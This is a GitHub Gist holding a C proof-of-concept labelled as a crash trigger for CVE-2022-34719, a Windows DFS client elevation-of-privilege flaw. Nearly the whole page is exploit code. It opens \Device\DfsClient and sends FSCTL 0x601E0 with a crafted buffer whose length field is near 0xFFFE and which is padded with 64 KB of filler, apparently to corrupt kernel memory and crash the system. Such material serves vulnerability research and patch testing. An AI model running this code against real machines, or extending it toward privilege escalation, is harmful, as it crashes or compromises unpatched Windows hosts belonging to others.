Created
October 9, 2022 23:56
-
-
Save y0ny0ns0n/a26a9241458f15bd7be04fa0ba68b76c to your computer and use it in GitHub Desktop.
Crash PoC for CVE-2022-34719( DFS EoP, patched on 2022.09 )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <Windows.h> | |
| #include <winternl.h> | |
| #define _BYTE BYTE | |
| #define _WORD WORD | |
| #pragma comment(lib, "ntdll.lib") | |
| typedef VOID(NTAPI* PIO_APC_ROUTINE)( | |
| _In_ PVOID ApcContext, | |
| _In_ PIO_STATUS_BLOCK IoStatusBlock, | |
| _In_ ULONG Reserved | |
| ); | |
| typedef NTSTATUS (WINAPI* NtFsControlFile_t)(HANDLE handle, HANDLE event, PIO_APC_ROUTINE apc, | |
| PVOID apc_context, PIO_STATUS_BLOCK io, ULONG code, PVOID in_buffer, ULONG in_size, PVOID out_buffer, ULONG out_size); | |
| NtFsControlFile_t NtFsControlFile; | |
| #pragma pack(push, 1) | |
| typedef struct DFSC_CREATE_DRIVER_LETTER | |
| { | |
| BYTE field_0; | |
| _BYTE gap_1; | |
| _WORD wFlags_2; | |
| _BYTE gap_4[4]; | |
| _WORD wFirstWideStrLen_8; | |
| _WORD wSecondWideStrLen_A; | |
| _WORD wThirdWideStrLen_C; | |
| _WORD field_E; | |
| _WORD wFourthWideStrLen_10; | |
| _WORD wFifthWideStrLen_12; | |
| _BYTE dataStart_14[1]; | |
| } DFSC_CREATE_DRIVER_LETTER; | |
| #pragma pack(pop) | |
| #define FUNC_ERROR(X) printf("[!] " ## X ## " failed, gle = 0x%x\n", GetLastError()) | |
| // https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34719 | |
| int main() { | |
| HMODULE hNtdll = LoadLibraryA("ntdll.dll"); | |
| NtFsControlFile = (NtFsControlFile_t)GetProcAddress(hNtdll, "NtFsControlFile"); | |
| UNICODE_STRING DfsString = { 0, }; | |
| RtlInitUnicodeString(&DfsString, L"\\Device\\DfsClient"); | |
| OBJECT_ATTRIBUTES objAttr = { 0, }; | |
| objAttr.Length = sizeof(OBJECT_ATTRIBUTES); | |
| objAttr.Attributes = OBJ_CASE_INSENSITIVE; | |
| objAttr.ObjectName = &DfsString; | |
| HANDLE hDfs = NULL; | |
| IO_STATUS_BLOCK ioStatusBlock = { 0, }; | |
| NTSTATUS ntRet = 0; | |
| ntRet = NtCreateFile(&hDfs, 0x100000, &objAttr, &ioStatusBlock, NULL, 0x80, 7, 3, 0xA0, NULL, 0); | |
| if (NT_SUCCESS(ntRet)) { | |
| printf("hDfs = 0x%x\n", hDfs); | |
| ULONG FsctlCode = 0x601E0; | |
| DFSC_CREATE_DRIVER_LETTER* input = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x40000); | |
| input->wFirstWideStrLen_8 = 6; | |
| input->wSecondWideStrLen_A = 0xFFFE - 6 - 0x46 + 0x10; | |
| memset(input->dataStart_14, 0x41, 0x10000); | |
| input->dataStart_14[0] = 'Z'; | |
| input->dataStart_14[1] = 0; | |
| input->dataStart_14[2] = ':'; | |
| input->dataStart_14[3] = 0; | |
| input->dataStart_14[4] = 0; | |
| input->dataStart_14[5] = 0; | |
| input->dataStart_14[6] = '\\'; | |
| input->dataStart_14[7] = 0; | |
| input->dataStart_14[8] = '\\'; | |
| input->dataStart_14[9] = 0; | |
| input->dataStart_14[12] = '\\'; | |
| input->dataStart_14[13] = 0; | |
| NtFsControlFile(hDfs, NULL, NULL, NULL, &ioStatusBlock, FsctlCode, input, 0x40000, NULL, 0); | |
| HeapFree(GetProcessHeap(), 0, input); | |
| CloseHandle(hDfs); | |
| } | |
| else { | |
| FUNC_ERROR("NtCreateFile"); | |
| printf("ntRet = 0x%x\n", ntRet); | |
| } | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment